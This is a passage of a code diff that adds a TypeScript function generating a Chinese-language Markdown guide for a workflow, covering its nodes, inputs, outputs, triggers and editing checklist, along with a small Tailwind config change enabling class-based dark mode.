+    return '修改统一字段、字段重命名、来源差异兼容时，优先编辑这里。';
+  }
+  if (haystack.includes('filter')) {
+    return '修改保留/丢弃规则、方向判断、告警类型分类时，优先编辑这里。';
+  }
+  if (haystack.includes('receive') || haystack.includes('incoming') || haystack.includes('syslog')) {
+    return '修改输入来源、日志格式识别、TDP/SkyEye 自动识别规则时，优先从这里开始。';
+  }
+  if (node.type === 'tool') return '修改外部工具名称、参数映射或工具返回值处理时，优先检查这里。';
+  if (node.type === 'llm') return '修改提示词、模型或结构化输出要求时，优先检查这里。';
+  return '修改此步骤的输入、输出或执行逻辑时，先确认上下游字段是否同步变化。';
+}
+
+function summarizeTrigger(trigger: WorkflowTrigger): string {
+  const enabled = trigger.enabled === false ? '关闭' : '启用';
+  const name = trigger.name || trigger.id;
+  return `- ${name}: ${trigger.type}，${enabled}${trigger.description ? `，${trigger.description}` : ''}`;
+}
+
+function summarizeSampleInputs(workflowJson: WorkflowJSON): string[] {
+  const sampleInputs = workflowJson.metadata?.sampleInputs;
+  if (!sampleInputs || typeof sampleInputs !== 'object') return [];
+  return Object.entries(sampleInputs).map(([key, value]) => {
+    const preview = typeof value === 'string'
+      ? value
+      : JSON.stringify(value);
+    return `- ${key}: ${preview.length > 120 ? `${preview.slice(0, 120)}...` : preview}`;
+  });
+}
+
+export function buildWorkflowMarkdown(workflow: Workflow): string {
+  const workflowJson = workflow.workflowJson;
+  const orderedNodeIds = buildLinearFlow(workflowJson);
+  const nodesById = new Map(workflowJson.nodes.map((node) => [node.id, node]));
+  const startNode = nodesById.get(workflowJson.start);
+  const terminalNodes = workflowJson.nodes.filter((node) => outgoingEdges(node.id, workflowJson.edges).length === 0);
+  const triggers = workflowJson.triggers || [];
+  const sampleInputLines = summarizeSampleInputs(workflowJson);
+  const workflowDir = workflow.source === 'global'
+    ? `~/.flocks/plugins/workflows/${workflow.id}/`
+    : `.flocks/plugins/workflows/${workflow.id}/`;
+  const generatedAt = new Date().toLocaleString();
+
+  const nodeTable = orderedNodeIds.map((nodeId, index) => {
+    const node = nodesById.get(nodeId);
+    if (!node) return '';
+    return `| ${index + 1} | ${tableCell(node.id)} | ${tableCell(summarizeDescription(node.description))} | ${tableCell(describeNodeOutputs(node, workflowJson))} |`;
+  }).filter(Boolean);
+
+  const nodeSections = orderedNodeIds.map((nodeId, index) => {
+    const node = nodesById.get(nodeId);
+    if (!node) return '';
+    const incoming = incomingEdges(node.id, workflowJson.edges).map(describeEdge);
+    const outgoing = outgoingEdges(node.id, workflowJson.edges).map(describeEdge);
+    return [
+      `### 4.${index + 1} ${node.id}`,
+      '',
+      `职责: ${summarizeDescription(node.description)}`,
+      '',
+      `- 节点类型: ${NODE_TYPE_LABELS[node.type] || node.type}`,
+      `- 输入来源: ${describeNodeInputs(node, workflowJson)}`,
+      `- 输出去向: ${describeNodeOutputs(node, workflowJson)}`,
+      `- 编辑重点: ${inferEditFocus(node)}`,
+      incoming.length > 0 ? `- 上游关系: ${formatList(incoming)}` : '- 上游关系: 从工作流输入开始',
+      outgoing.length > 0 ? `- 下游关系: ${formatList(outgoing)}` : '- 下游关系: 输出工作流结果',
+    ].join('\n');
+  }).filter(Boolean);
+
+  return [
+    `# ${workflow.name || workflow.id}`,
+    '',
+    '这份 `workflow.md` 是工作流的人类可编辑说明。它用来解释工作流的功能、处理原理、输入输出和可修改位置；机器执行仍以 `workflow.json` 为准。',
+    '',
+    '## 1. 功能概览',
+    '',
+    `一句话说明: ${workflow.description ? summarizeDescription(workflow.description) : '这个工作流会按固定步骤处理输入，并整理出稳定、可验证的输出结果。'}`,
+    '',
+    '基本信息:',
+    '',
+    `- 工作流 ID: \`${workflow.id}\``,
+    `- 工作流目录: \`${workflowDir}\``,
+    `- 分类: \`${workflow.category || 'default'}\``,
+    `- 状态: \`${workflow.status || 'draft'}\``,
+    `- 入口节点: ${nodeLabel(startNode)}`,
+    `- 终点节点: ${formatList(terminalNodes.map(nodeLabel))}`,
+    `- 生成时间: ${generatedAt}`,
+    '',
+    '适合在这里写清楚:',
+    '',
+    '- 这个工作流解决什么问题。',
+    '- 适合处理什么输入。',
+    '- 不负责处理什么边界场景。',
+    '',
+    '## 2. 原理和总体流程',
+    '',
+    '核心原理是把输入按节点顺序逐步加工，每个节点只负责一个清晰职责。流程顺序如下:',
+    '',
+    '```text',
+    orderedNodeIds.join(' -> '),
+    '```',
+    '',
+    '流程表:',
+    '',
+    '| 顺序 | 节点 | 做什么 | 下一步 |',
+    '| --- | --- | --- | --- |',
+    ...nodeTable,
+    '',
+    '编辑流程结构时，要同时确认节点顺序、边关系、字段映射和最终输出是否仍然一致。',
+    '',
+    '## 3. 输入说明',
+    '',
+    '本章用于说明工作流接受什么输入，以及入口节点如何理解这些输入。',
+    '',
+    sampleInputLines.length > 0
+      ? '当前工作流保存了这些样例输入，可以先照着这些字段测试:'
+      : '当前工作流还没有保存样例输入。建议先补一条最小可运行输入，方便后续测试。',
+    '',
+    ...(sampleInputLines.length > 0 ? sampleInputLines : ['- 待补充。']),
+    '',
+    '修改输入时，至少同步检查:',
+    '',
+    '- 入口节点是否能读取新字段。',
+    '- 样例输入是否覆盖主要场景。',
+    '- 下游节点是否还在引用旧字段名。',
+    '- 发布方式中的参数说明是否需要更新。',
+    '',
+    '## 4. 模块逻辑',
+    '',
+    '本章按执行顺序解释每个节点。修改内部逻辑时，优先定位到对应节点，再检查它的上下游关系。',
+    '',
+    ...nodeSections.flatMap((section) => [section, '']),
+    '## 5. 输出说明',
+    '',
+    '本章用于维护工作流最终返回什么，以及是否产生额外副作用。',
+    '',
+    '输出说明建议包含:',
+    '',
+    '- 返回给用户或调用方的核心字段。',
+    '- 给下游系统继续消费的结构化字段。',
+    '- 是否写文件、发通知、调用外部系统或更新状态。',
+    '- 没有结果、部分失败、完全失败时分别返回什么。',
+    '',
+    '如果还不确定输出格式，先用一条样例跑通，再把真实返回字段补到这里。',
+    '',
+    '## 6. 发布方式',
+    '',
+    '发布页会根据 `config.json` 模板和运行时状态决定展示哪些能力；`workflow.md` 只负责解释这些能力的用途。',
+    '',
+    triggers.length > 0 ? '当前 `workflow.json` 里配置了这些触发器:' : '当前 `workflow.json` 里还没有显式触发器。',
+    '',
+    ...(triggers.length > 0 ? triggers.map(summarizeTrigger) : ['- 可以通过发布页配置 API、Syslog、Kafka、Schedule 或 Webhook 等方式。']),
+    '',
+    '发布相关编辑原则:',
+    '',
+    '- 改展示模板: 修改 `config.json`。',
+    '- 改运行启停状态: 通过发布页或后端运行时状态处理。',
+    '- 改参数语义: 同步更新本章、输入说明和相关节点。',
+    '- 不要把明文密钥、长期 token 或私人路径写进 `workflow.md` 或 `config.json`。',
+    '',
+    '## 7. 编辑指南',
+    '',
+    '先判断你要改哪一类内容，再去找对应位置:',
+    '',
+    '| 修改目标 | 优先查看 |',
+    '| --- | --- |',
+    '| 输入格式、来源、样例 | 第 3 章和入口节点 |',
+    '| 字段映射、清洗、分类 | 第 4 章对应节点 |',
+    '| 分支、循环、节点增删 | `workflow.json` 和第 2 章流程表 |',
+    '| 输出字段、落盘、通知 | 第 5 章和终点节点 |',
+    '| API、Syslog、Kafka 等发布方式 | `config.json` 和第 6 章 |',
+    '| 字段重命名 | 所有上下游节点、样例输入和输出说明 |',
+    '',
+    '编辑后建议把改动说明写回相应章节，让下一个人可以直接看懂为什么这样改。',
+    '',
+    '## 8. 验证方式',
+    '',
+    '最小验收清单:',
+    '',
+    '- [ ] 用一条正常样例能跑通。',
+    '- [ ] 输出字段符合你的预期。',
+    '- [ ] 如果改了字段名，下游节点没有继续引用旧字段。',
+    '- [ ] 如果改了发布方式，发布页只展示应该出现的能力。',
+    '- [ ] 没有明文密钥、长期 token 或私人路径写进工作流目录。',
+    '',
+  ].join('\n');
+}
diff --git a/webui/tailwind.config.js b/webui/tailwind.config.js
index a9df11c5e..49e61e432 100644
--- a/webui/tailwind.config.js
+++ b/webui/tailwind.config.js
@@ -2,6 +2,7 @@ import typography from '@tailwindcss/typography'
 
 /** @type {import('tailwindcss').Config} */
 export default {
+  darkMode: 'class',
   content: [
     './index.html',
     './src/**/*.{js,ts,jsx,tsx}',
@@ -29,4 +30,4 @@ export default {
     },
   },
   plugins: [typography],
-}
\ No newline at end of file
+}